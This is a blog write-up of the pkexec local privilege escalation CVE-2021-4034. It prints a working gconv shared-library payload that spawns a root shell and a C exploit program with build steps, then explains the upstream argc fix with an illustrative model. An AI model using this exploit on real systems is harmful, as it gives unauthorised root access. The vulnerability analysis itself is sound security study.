Vulnerability-Analysis - CVE-2021-4034 Linux Polkit Privilege Escalation

The major reference: Qualys’ Advisory

Vulnerability Profile

On 2022-01-25 the exploit details of CVE-2021-4034 were released. The vulnerability was found by the Qualys Security Team in pkexec, a component of the polkit suite.

pkexec is a set-uid tool that allows an ordinary user to execute a command as a privileged user according to a predefined policy. All mainstream Linux systems install it by default, and its executable has the SUID bit set, which it needs in order to work.

All pkexec versions since the first one, from May 2009, are vulnerable. The commit: Add a pkexec(1) command (c8c3d835) · Commits · polkit / polkit · GitLab

Because pkexec is so widely deployed, the exploit for this vulnerability works on nearly all current Linux distributions.

Vulnerability Analysis

Please read the official advisory: Qualys’ Advisory

In summary, two environment variables are needed to exploit the vulnerability. The first is set to an arbitrary string, such as x; the second is set to PATH=GCONV_PATH=., which gets concatenated with /x, so the command to execute becomes GCONV_PATH=./x. Once GCONV_PATH=./x is in place, we have reintroduced an insecure environment variable, which leads to privilege escalation.

The Exploit

I installed Ubuntu 20.04 and found that its pkexec version is 0.105, which is vulnerable.

First, we need to build a malicious shared library, which is used to obtain the privileged shell.

The code is shown below:

#include <stdlib.h>
#include <unistd.h>

void gconv() {}

// called by glibc when the gconv module is loaded
void gconv_init() {
    setuid(0); seteuid(0); setgid(0); setegid(0);
    system("PATH=/bin:/usr/bin:/sbin /bin/sh");
}

Build it:

gcc -shared -fPIC payload.c -o payload.so

The exploit:

  • LC_MESSAGES is used to set the charset.
  • XAUTHORITY is set to an invalid value to skip the normal execution path; we only need the error-logging function to exploit the vulnerability.
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

int main() {
    // argc == 0: argv[0] is NULL, so pkexec's argv[1] aliases envp[0]
    char* _argv[] = { NULL };
    char* _envp[] = {
        "x",                        // the arbitrary string pkexec reads as its program name
        "PATH=GCONV_PATH=.",        // x is resolved to GCONV_PATH=./x
        "LC_MESSAGES=en_US.UTF-8",  // sets the charset
        "XAUTHORITY=..",            // invalid value, so pkexec takes the logging path
        NULL
    };
    mkdir("GCONV_PATH=.", 0777);
    mkdir("x", 0777);
    // gconv-modules maps the UTF-8 charset to ../payload (payload.so)
    FILE *fp = fopen("x/gconv-modules", "wb");
    fprintf(fp, "module UTF-8// INTERNAL ../payload 2\n");
    fclose(fp);
    // the file that the PATH lookup for x must find
    fp = fopen("GCONV_PATH=./x", "wb");
    fclose(fp);
    chmod("GCONV_PATH=./x", 0777);
    execve("/usr/bin/pkexec", _argv, _envp);
}

Build it:

gcc exploit.c -o exp.out

Run ./exp.out and you will get a privileged shell.

Fix the Vulnerability

The fix commit: pkexec: local privilege escalation (CVE-2021-4034) (a2bf5c9c) · Commits · polkit / polkit · GitLab

[screenshot: diff of commit a2bf5c9c]

As the diff shows, if the value of argc is less than 1, the program now exits immediately.
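To show why that single argc check is enough, here is an added example (not code from this post or from polkit) that models the argv/envp layout the kernel builds and a simplified version of pkexec 0.105's argument handling, vulnerable and fixed side by side. The names fresh_argv, env_value, resolve_program and fixed_resolve_program are assumptions of this example, and PATH resolution is reduced to string concatenation.

```c
#include <stdio.h>
#include <string.h>

/* Constructed vector laid out like the kernel's stack: argv[0..argc-1], NULL,
 * envp[0..], NULL. Built for argc == 0, so argv[1] is the same cell as envp[0]. */
static const char *const attack_template[] = { NULL, "x", "PATH=GCONV_PATH=.", NULL };
static char *argv_buf[4];
static char resolved[64];                  /* stands in for the g_strdup'd path */

char **fresh_argv(void) {                  /* fresh copy, so each call starts clean */
    for (int i = 0; i < 4; i++) argv_buf[i] = (char *)attack_template[i];
    return argv_buf;
}

static const char *env_value(char **envp, const char *key) {   /* getenv over envp */
    size_t k = strlen(key);
    for (; *envp; envp++)
        if (strncmp(*envp, key, k) == 0 && (*envp)[k] == '=') return *envp + k + 1;
    return NULL;
}

/* Simplified pkexec 0.105 logic: skip leading "--" options, take argv[n] as
 * the program, resolve it in PATH and write the result back into argv[n].
 * Returns the resolved path, or NULL if there is no program argument. */
const char *resolve_program(int argc, char **argv) {
    char **envp = argv + argc + 1;         /* where the kernel places envp */
    int n;
    for (n = 1; n < argc; n++)
        if (strncmp(argv[n], "--", 2) != 0) break;
    const char *prog = argv[n];            /* argc == 0: this reads envp[0] */
    if (prog == NULL) return NULL;
    const char *path = env_value(envp, "PATH");
    if (path == NULL) return NULL;
    snprintf(resolved, sizeof resolved, "%s/%s", path, prog);
    argv[n] = resolved;                    /* argc == 0: this writes envp[0] */
    return resolved;
}

const char *fixed_resolve_program(int argc, char **argv) {
    if (argc < 1) return NULL;             /* the upstream fix; real pkexec exits 127 here */
    return resolve_program(argc, argv);
}

int main(void) {
    char **argv = fresh_argv();
    resolve_program(0, argv);              /* vulnerable path */
    printf("envp[0] after vulnerable run: \"%s\"\n", argv[1]);   /* GCONV_PATH=./x */
    printf("fixed run with argc 0: %s\n", fixed_resolve_program(0, fresh_argv()) ? "ran" : "refused");
    return 0;
}
```

The vulnerable path turns an envp entry into GCONV_PATH=./x through an out-of-bounds read followed by an out-of-bounds write of argv[1]; the fixed path never touches argv when argc is 0.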

Author: 4xpl0r3r

Posted on: 2022-01-30

Updated on: 2022-09-14
